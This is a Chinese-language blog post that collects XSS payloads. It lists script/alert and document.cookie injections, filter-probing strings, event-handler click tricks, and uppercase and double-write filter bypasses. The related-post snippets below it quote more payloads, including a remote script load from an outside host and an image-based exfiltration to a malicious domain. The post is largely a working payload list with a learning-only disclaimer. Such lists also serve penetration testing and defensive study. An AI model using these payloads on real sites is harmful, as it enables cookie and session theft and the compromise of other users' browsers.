常规的xss漏洞payload合集

已于 2024-12-04 23:05:24 修改
阅读量574 收藏 10
点赞数 10
文章标签: xss 网络安全 web安全 网络攻击模型 安全
于 2024-12-02 13:25:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81188416/article/details/144186011
版权

声明

本文编写的目的仅用于学习

1.常规payloads

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
οnerrοr="alert('XSS')">

2.测试payload

" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;  #可以F12观察代码中的返回结果,看看到底过滤了什么

3.点击绕过

' οnfοcus=javascript:alert() ' #onfocus事件在元素获得焦点时触发,最常与 <input>、<select> 和 <a> 标签一起使用,以上面图片的html标签<input>为例,<input>标签是有输入框的,
简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码
" οnfοcus=javascript:alert() " #这次是双引号
"> <a href=javascript:alert()>xxx</a> <"   #之后点击xxx,触发a标签href属性即可
"> <img src=666 οnmοuseοut="alert()"> <"  ①当鼠标移出图片的时候执行的属性onmouseout 
"> <img src=666 οnmοuseοut="alert()"> <"  ②当鼠标移动到图片的时候执行的属性onmouseover

4.大写绕过

"> <sCript>alert()</sCript> <"
" Onfocus=javascript:alert() "
"> <a hRef=javascript:alert()>x</a> <"

5.双写绕过

"> <a hrehreff=javasscriptcript:alert()>x</a> <"
<scscriptript>alert('XSS')</sscriptcript>

Xxboy1012
关注
XSS payload (大集合)
m0_51186260的博客
10-18 3429
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
qwsn
01-25 4171
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试-加载payload的方法 1、背景 2、xss平台通用payload加载 3、img 创建script标签加载 4、字符并接加载 5、jquery加载
XSS-Payloads集合
LiBai'S BLOG
10-31 2156
XSS-Payloads <!-- 仅适用于反射型XSS --!> <svg/onload=eval(name)> <!-- 如果你控制了 URL --> <svg/onload=eval(`'`+URL)> <!-- 如果你控制了名字,但是 unsafe-eval 没有启用 --> <svg/onload=location=name> <!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM
渗透测试&护网&网络安全---xss
zhenghdmax的博客
03-10 1067
例如,使用<img src="http://[恶意域名]/<敏感数据>">,当浏览器尝试加载该图片时,会向恶意域名对应的DNS服务器发送请求,携带敏感数据作为子域名或路径参数,攻击者通过监控DNS服务器日志获取数据。:审视网页中所有接收用户输入的地方,如表单字段、URL参数、搜索框等,尝试输入特殊字符(如<script>、<img>等),观察页面是否过滤或转义。:攻击者将恶意脚本存储在目标网站,当管理员等高权限用户访问时,脚本执行,可能窃取管理员会话、修改网站配置、添加恶意用户等,实现提权操作。
XSS-Payload大全
gy1bubble的博客
10-11 1718
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
xss payload大全(实用)
热门推荐
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
XSS常用payload整理(持续更新)
纸房子
12-13 6319
XSS常用payload
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
XSS漏洞
2401_83181186的博客
04-25 1156
XSS漏洞介绍以及beef,waf简介
基于django 的xss漏洞扫描检测系统
最新发布
laoman456的博客
04-18 1227
本工具用于扫描和检测网站中可能存在的 XSS (跨站脚本攻击) 漏洞。通过模拟发送 HTTP 请求,注入特定的 JavaScript 代码(payload),该工具能够检测目标网站是否容易受到 XSS 攻击。本工具支持 GET 和 POST 请求的扫描,并可以测试表单输入和 URL 查询参数中是否存在潜在的漏洞。自动生成不同级别的 XSS payload。支持扫描 GET 和 POST 请求中的潜在漏洞。支持扫描 URL 查询参数和表单输入。
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5760
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xsspayload大全.txt
11-29
各类xss漏洞payload,包含:没有事件处理程序、没有空间、无斜杠(/)、没有等号(=)、不带尖括号(>)、无提示,确认,提示、类payload
xss_payloads:对 XSS 的利用
07-24
xss_payloads 用于实际开发跨站点脚本的有效负载。 用法 在您的应用中查找 XSS 漏洞 获取 PoC 漏洞:alert(1) 等 在某处托管这些有效载荷 使用 vuln 将这些负载之一拉入应用程序[removed][removed] 利润 js vs php 文件 一些文件是纯 JavaScript .js 文件,另一些是 PHP 脚本,它们在呈现时为 JavaScript 提供服务以执行一些更复杂的工作。 确保您在选择的 Web 服务器上运行了 PHP 解释器,以使其正常工作</obvious> 常见问题 如果您的应用在 HTTPS 上运行,则无法通过 HTTP 提供这些服务。 您需要通过 HTTPS 为它们提供服务 如果您通过 HTTPS 运行这些用于实际利用而不是 PoC,您将需要一个适当的可信 TLS 证
86.网络安全渗透测试—[常规漏洞挖掘与利用篇2]—[xss漏洞利用平台-搭建与测试]
qwsn
01-24 2986
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞利用平台-搭建与测试 1、详细说明 2、下载地址 3、搭建过程 4、测试模块:`基础认证钓鱼`【总是失败】 5、测试默认模块:`窃取cookie`【成功】 6、安装其他模块 7、测试模块:`获取内网 ip`【时好时坏】 8、测试模块:`键盘记录器`【成功】 9、测试模块:`html5截屏`【失败】 10、测试模块:`获取xss02.php页面源码`【成功】 11、总结
网络安全-js安全知识点与XSS常用payloads
关注网络安全、云原生安全
10-16 4589
写给学习安全的小白, 简介 JavaScript 是一种轻量级的编程语言,定义了HTML的行为。它与Java的关系类似周杰和周杰伦的关系(即没有关系)。 用法 HTML 中的脚本必须位于 <script> 与 </script> 标签之间。 脚本可被放置在 HTML 页面的 <body> 和 <head> 部分中。 输出与注释 输出 使用 window.alert() 弹出警告框。 使用 document.write() 方法将内容写到 HT
xss payload大全
aiquan9342的博客
10-27 348
刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了。 code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js>...
XSS payload 大全
08-01 491
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL <a href="javascript:alert('test')">link</a> <a href="java&#115;cript:alert('xss')">link</a> <a href='vbscri...
客户端安全揭秘:去年攻破的XSS与防御策略
文档还提到了历史上的腾讯QQ群XSS漏洞,攻击者能够利用群资料名称调用Web接口的功能,将恶意payload插入群名,然后在查看群资料时触发跨站攻击。这表明即使是最常见的聊天工具也可能成为攻击者的靶标。 防御策略...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值